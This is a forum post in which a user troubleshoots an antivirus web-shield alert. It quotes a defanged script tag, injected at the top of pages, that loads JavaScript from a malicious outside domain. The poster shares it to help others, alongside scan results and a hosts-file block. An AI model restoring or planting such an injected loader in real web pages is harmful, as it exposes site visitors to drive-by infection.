I'm also getting that same error,
The Sinowal cleaner found nothing in the MBR, (it's still working through my HD at this time.)
For those of you also getting hit by this, if you pause the Web shield part of Avast, and then look at the source of the web page (Edit, View Source) you'll probably find the evil script inserted before any of the html of the website.
This is the one I'm getting.
[skript language="jabaskript" type="text/jabaskript" src="hxxp://mk.cxaaaa.cn/mk.js"></script]
It is always at the very top of the source code, before anything else.
Note: other than changing spellings in the script coding, I only altered the http portion of the actual address given in the script. Hopefully I sufficiently deactivated the script without making it unreadable.
I'm trying to find the source of it, and am beginning to wonder if it's coming from my ISP's server, because I've done boot scans with Avast, I've run the latest MSRT, I'm running the Sinowal cleaner, but it hasn't found anything in the MBR where Sinowal resides, and so far it hasn't found anything anywhere else yet, and none of the scans have found anything on the system.
I'd use no script but it's a pain with all the other legal scripts in use out there. That, and I use Opera even more than Firefox and I don't have a no-script plugin for Opera.
What I'm wondering is why can't the so called Web shield, just deactivate, block or remove the bad script, rather than just blocking access to the supposedly infected sites, which really means it blocks all web access at times.
Knowing it's there is good, but I've placed the domain name from the script into my hosts file, so it shouldn't be able to resolve the actual script anyway, but I don't like that I have to disable the web shield to do anything on the web, including come and post here.
I just wanted to add that I have a login page I have to use for my ISP like sam-cit does. And it too at times has evidenced the script.